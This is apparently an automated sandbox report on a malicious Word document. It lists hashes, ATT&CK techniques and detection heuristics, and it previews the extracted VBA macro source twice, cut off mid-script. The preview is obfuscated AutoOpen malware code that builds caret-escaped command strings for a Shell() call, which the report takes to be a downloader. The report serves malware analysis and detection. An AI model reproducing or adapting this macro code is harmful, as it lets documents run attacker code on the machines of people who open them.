Office (OLE) malware analysis — malicious · 284cbbbe13010bb1

MALICIOUS

Office (OLE)

221.6 KB Created: 2018-09-25 08:10:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 7dba3334c3eafb12307c2d05b8e4d47c SHA-1: f0cfb6a6c7d5cad98ea438402659b2682d558fc4 SHA-256: 284cbbbe13010bb147869f494ff2fd39833d1ca4e24c679f4fadbbcc05a9b7bd

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute external code. The macro's obfuscated nature and truncated script prevent a definitive analysis of its exact payload, but the presence of the Shell() call strongly suggests it is designed to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Malware.00536d-6697202-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6697202-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 204463 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	204463 bytes
SHA-256: `740abfb00984db3a04c9cb091f128936e007322555e2318a3bd329686488db6c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DVlSjIhmjR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim EDSkYR(2) EDSkYR(0) = Mid(wMQErZS + QiOWoICtsJiTNFZ + SRvLjTa, 519, 446) + MidB(iZBvD + QuKiiYRlizrmAqziDpVi + dhilLnP, 680, 786) EDSkYR(1) = MidB(RkmXc + wdjdLOrwVaauDArEjZq + zrIPG, 234, 213) + Left(nlDwAVQ + ruIOOojljYiHGfTGbEj + zGZZE, 9) Dim mZwnzi(2) mZwnzi(0) = Mid(aZaiB + fIaUBJSHjIPHWPckwiHH + ruAfJfwH, 522, 895) + Mid(fTiUdqE + UpLzoTwzXAAXRQwEJI + wwFrGbF, 323, 74) + Left(WEpiULh + XRdIIOCszjLowjbLUs + StoKcids, 549) + Mid(EhUzi + sYEBRhbjlkWqlQOUDad + EOlIj, 573, 729) mZwnzi(1) = Right(vzisQc + AzrIGHoMJiOnJwzDvi + zqCum, 646) + Mid(mOkaiXzz + UTUDffkZvSYKlERDMiGkOw + Xklzz, 920, 510) + Mid(lwLWwBI + NEzVkfhurNjFGfcnwScj + IvFjQdw, 73, 735) + MidB(ECzGPFBj + fpjuVAUikUcrbNdNOfTX + YAhiNb, 7, 428) Dim FZmuci(1) FZmuci(0) = MidB(wbcKYWn + VmMMRwzAnzwIGwiCa + kKqZIwN, 544, 202) + Right(EijYQn + zcqWjpWDZskjBCWsnYk + EbEoVhi, 811) Dim ZjvYM(2) ZjvYM(0) = Left(HcsdV + HKDYmJvtcZOCGJfViwXDKO + IXBiz, 964) + MidB(bAVAaGf + zzHvzwrzzvjHJzmWc + QmjhiBm, 906, 451) + Left(kKQVOK + qzAUqTGqaTJZhUOPRT + ZiOWi, 883) + MidB(cvwDaPS + XqvUDIMliAzuINapczYQDp + dUwSCY, 37, 882) ZjvYM(1) = Left(kWWSJ + nlhmjfocNQziLuSsnQw + OkbKETKn, 536) + Mid(EKbtCS + KluCSGczRIuoXwqV + DcXUc, 501, 28) Dim pUmZP(1) pUmZP(0) = Mid(iJEtrK + LbtVDvztPHJqfJJaco + vhCQhQ, 809, 349) + Right(EJAjf + cXsJIwzTYkhktiDoAffjDzN + Zpzdvw, 998) daOPpjYMKN (KeyString(JtnJjBa + RKCPu + 0 + 8 + 3 + 12 + 44 + uvqsME + FkSAVq) + ICaIO + mwaUL + KeyString(puoLov + YFjVEw + 0 + 10 + 4 + 14 + 49 + nLPztMU + hlDtm) + nFrtGwiw + PQkuJFJimN + zLzYGZcjTnq + PTEBoi + otPDnl + prBfhEbiiaX + daQQncdWi + jcfivOb + iBTmmvbwUpu + LbAGmDqNEqZ + bzsZTFhI + YctdB + wGaPmq + ussiV + JCiXiWKi + IPbqNG + ifDwScjR + HPbCsw + miFQN + kIMZF) Dim qNwzqp(2) qNwzqp(0) = Left(vfadZGmn + oGLFvOowNFqsQmhwC + trnZqk, 363) + Left(USLRhXlR + CrzpEnGITFproOSWYhVz + YhBStBP, 277) qNwzqp(1) = Mid(itCimj + fsfbWUCSvLskFfFFJ + paTRjT, 345, 686) + MidB(ZLTWEzKw + jUCYqqJzjizuNHFXBk + XYVYN, 1, 663) Dim LYiVY(2) LYiVY(0) = MidB(pJUjDKc + TAqFbFAIfzVRwlYlVih + fhrQB, 158, 258) + Mid(Ruzsq + TiMtvENXMSlqlUdZuFp + RDRAB, 950, 538) + MidB(XCvUmRaJ + ppbGJpIfQkIdkMmXLakXsS + QhMwkcz, 173, 199) + MidB(ILtSNiJP + IKZolSESjnRzBRzjjbC + iMSHXsiC, 364, 408) LYiVY(1) = MidB(nKzJiE + JqDBUNKjskiJZzKh + lwnia, 283, 128) + Right(BXKflo + nLfYTaDzIBZKUFYsQSu + KNqNu, 882) + MidB(QiWVuc + CfcGFajAtZNwsOYOFjX + OjIbz, 10, 443) + MidB(UNmRq + BJMBUjZkiHVOMXYrYSjj + wGbfLb, 474, 451) Dim ZKGji(1) ZKGji(0) = Left(rTtBPuf + swcQRafYZzsiwiHO + pJRjrP, 128) + MidB(Mwwviau + wzaLJJtRLDjmQCpKkaLGK + BvcTI, 63, 396) + Left(XqiAIn + vRAafizjkiMnrPUzqzCz + AqIYoC, 932) + Right(KtqmVM + XSqJcjaKzphAsJisoHwih + jWiKnk, 220) End Sub Attribute VB_Name = "hVGXKiOkCGT" Function nFrtGwiw() YpcNHAH = "d" + " " + CStr(Chr(2 + 7 + 5 + 0 + 33)) + "V" + "^:" + "O" + "N" + CStr(Chr(2 + 7 + 5 + 0 + 33)) + "C" jMHAEAnI = CStr(Chr(1 + 4 + 3 + 0 + 26)) + "^s" + "^" + "e^" + "t" ZhsaYpjwD = " #" + "^" + "~=" + "^" + "3" + "^5" + "^" + "1^" + " " + "9^" ifckNmw = "0" + "5^" + " ^" + "30" + "^9" Dim ozrtQG(2) ozrtQG(0) = MidB(poAADEii + VGpzsKrHCnFTrRmzolzK + RjjINE, 276, 610) + Left(LArHh + wUIjVIRbciLtWYaaKpt + ZAiFll, 967) ozrtQG(1) = MidB(TApSova + mbfTZmPmjGrdFVVadfq + ZaWGwk, 591, 998) + MidB(HXtFavqz + LvpuTiaAULvwOPIpiCGdi + pEvimfXN, 107, 573) Dim SsVjDh(2) SsVjDh(0) = MidB(ZWtqH + UNizmiiMdpwEDzqRrHEP + fEojf, 23, 740) + Left(tNMRHGf + ROHqCaSZqSpQzInGdmcCAZJl + jKMjO, 973) SsVjDh(1) = Right(pCNQG + dpdQDdAduCoMHQsWPfGGBw + RajNjbG, 445) + Left(VoZjhbo + wuYKZklRWjcRFCFhWNGk + Smwjz, 598) Dim mNGEzt(1) mNGEzt(0) = Left(aiLaj + kPERLVtZfVijXQPnVc + GkrmYLtU, 968) + Mid(nzBMZf + jZiLGnVuLsNiIRTKwhjKW + klIEq, 167, 70) LWfmG = "^ " + "^0" + "^9" + "3" + " " + "5" + "3" + " ... (truncated)

SHA-256: 740abfb00984db3a04c9cb091f128936e007322555e2318a3bd329686488db6c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DVlSjIhmjR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim EDSkYR(2)
EDSkYR(0) = Mid(wMQErZS + QiOWoICtsJiTNFZ + SRvLjTa, 519, 446) + MidB(iZBvD + QuKiiYRlizrmAqziDpVi + dhilLnP, 680, 786)
EDSkYR(1) = MidB(RkmXc + wdjdLOrwVaauDArEjZq + zrIPG, 234, 213) + Left(nlDwAVQ + ruIOOojljYiHGfTGbEj + zGZZE, 9)
   Dim mZwnzi(2)
mZwnzi(0) = Mid(aZaiB + fIaUBJSHjIPHWPckwiHH + ruAfJfwH, 522, 895) + Mid(fTiUdqE + UpLzoTwzXAAXRQwEJI + wwFrGbF, 323, 74) + Left(WEpiULh + XRdIIOCszjLowjbLUs + StoKcids, 549) + Mid(EhUzi + sYEBRhbjlkWqlQOUDad + EOlIj, 573, 729)
mZwnzi(1) = Right(vzisQc + AzrIGHoMJiOnJwzDvi + zqCum, 646) + Mid(mOkaiXzz + UTUDffkZvSYKlERDMiGkOw + Xklzz, 920, 510) + Mid(lwLWwBI + NEzVkfhurNjFGfcnwScj + IvFjQdw, 73, 735) + MidB(ECzGPFBj + fpjuVAUikUcrbNdNOfTX + YAhiNb, 7, 428)
   Dim FZmuci(1)
FZmuci(0) = MidB(wbcKYWn + VmMMRwzAnzwIGwiCa + kKqZIwN, 544, 202) + Right(EijYQn + zcqWjpWDZskjBCWsnYk + EbEoVhi, 811)
   Dim ZjvYM(2)
ZjvYM(0) = Left(HcsdV + HKDYmJvtcZOCGJfViwXDKO + IXBiz, 964) + MidB(bAVAaGf + zzHvzwrzzvjHJzmWc + QmjhiBm, 906, 451) + Left(kKQVOK + qzAUqTGqaTJZhUOPRT + ZiOWi, 883) + MidB(cvwDaPS + XqvUDIMliAzuINapczYQDp + dUwSCY, 37, 882)
ZjvYM(1) = Left(kWWSJ + nlhmjfocNQziLuSsnQw + OkbKETKn, 536) + Mid(EKbtCS + KluCSGczRIuoXwqV + DcXUc, 501, 28)
   Dim pUmZP(1)
pUmZP(0) = Mid(iJEtrK + LbtVDvztPHJqfJJaco + vhCQhQ, 809, 349) + Right(EJAjf + cXsJIwzTYkhktiDoAffjDzN + Zpzdvw, 998)
daOPpjYMKN (KeyString(JtnJjBa + RKCPu + 0 + 8 + 3 + 12 + 44 + uvqsME + FkSAVq) + ICaIO + mwaUL + KeyString(puoLov + YFjVEw + 0 + 10 + 4 + 14 + 49 + nLPztMU + hlDtm) + nFrtGwiw + PQkuJFJimN + zLzYGZcjTnq + PTEBoi + otPDnl + prBfhEbiiaX + daQQncdWi + jcfivOb + iBTmmvbwUpu + LbAGmDqNEqZ + bzsZTFhI + YctdB + wGaPmq + ussiV + JCiXiWKi + IPbqNG + ifDwScjR + HPbCsw + miFQN + kIMZF)
   Dim qNwzqp(2)
qNwzqp(0) = Left(vfadZGmn + oGLFvOowNFqsQmhwC + trnZqk, 363) + Left(USLRhXlR + CrzpEnGITFproOSWYhVz + YhBStBP, 277)
qNwzqp(1) = Mid(itCimj + fsfbWUCSvLskFfFFJ + paTRjT, 345, 686) + MidB(ZLTWEzKw + jUCYqqJzjizuNHFXBk + XYVYN, 1, 663)
   Dim LYiVY(2)
LYiVY(0) = MidB(pJUjDKc + TAqFbFAIfzVRwlYlVih + fhrQB, 158, 258) + Mid(Ruzsq + TiMtvENXMSlqlUdZuFp + RDRAB, 950, 538) + MidB(XCvUmRaJ + ppbGJpIfQkIdkMmXLakXsS + QhMwkcz, 173, 199) + MidB(ILtSNiJP + IKZolSESjnRzBRzjjbC + iMSHXsiC, 364, 408)
LYiVY(1) = MidB(nKzJiE + JqDBUNKjskiJZzKh + lwnia, 283, 128) + Right(BXKflo + nLfYTaDzIBZKUFYsQSu + KNqNu, 882) + MidB(QiWVuc + CfcGFajAtZNwsOYOFjX + OjIbz, 10, 443) + MidB(UNmRq + BJMBUjZkiHVOMXYrYSjj + wGbfLb, 474, 451)
   Dim ZKGji(1)
ZKGji(0) = Left(rTtBPuf + swcQRafYZzsiwiHO + pJRjrP, 128) + MidB(Mwwviau + wzaLJJtRLDjmQCpKkaLGK + BvcTI, 63, 396) + Left(XqiAIn + vRAafizjkiMnrPUzqzCz + AqIYoC, 932) + Right(KtqmVM + XSqJcjaKzphAsJisoHwih + jWiKnk, 220)
End Sub


Attribute VB_Name = "hVGXKiOkCGT"
Function nFrtGwiw()
YpcNHAH = "d" + " " + CStr(Chr(2 + 7 + 5 + 0 + 33)) + "V" + "^:" + "O" + "N" + CStr(Chr(2 + 7 + 5 + 0 + 33)) + "C"
jMHAEAnI = CStr(Chr(1 + 4 + 3 + 0 + 26)) + "^s" + "^" + "e^" + "t"
ZhsaYpjwD = " #" + "^" + "~=" + "^" + "3" + "^5" + "^" + "1^" + " " + "9^"
ifckNmw = "0" + "5^" + " ^" + "30" + "^9"
Dim ozrtQG(2)
ozrtQG(0) = MidB(poAADEii + VGpzsKrHCnFTrRmzolzK + RjjINE, 276, 610) + Left(LArHh + wUIjVIRbciLtWYaaKpt + ZAiFll, 967)
ozrtQG(1) = MidB(TApSova + mbfTZmPmjGrdFVVadfq + ZaWGwk, 591, 998) + MidB(HXtFavqz + LvpuTiaAULvwOPIpiCGdi + pEvimfXN, 107, 573)
   Dim SsVjDh(2)
SsVjDh(0) = MidB(ZWtqH + UNizmiiMdpwEDzqRrHEP + fEojf, 23, 740) + Left(tNMRHGf + ROHqCaSZqSpQzInGdmcCAZJl + jKMjO, 973)
SsVjDh(1) = Right(pCNQG + dpdQDdAduCoMHQsWPfGGBw + RajNjbG, 445) + Left(VoZjhbo + wuYKZklRWjcRFCFhWNGk + Smwjz, 598)
   Dim mNGEzt(1)
mNGEzt(0) = Left(aiLaj + kPERLVtZfVijXQPnVc + GkrmYLtU, 968) + Mid(nzBMZf + jZiLGnVuLsNiIRTKwhjKW + klIEq, 167, 70)
LWfmG = "^ " + "^0" + "^9" + "3" + " " + "5" + "3" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.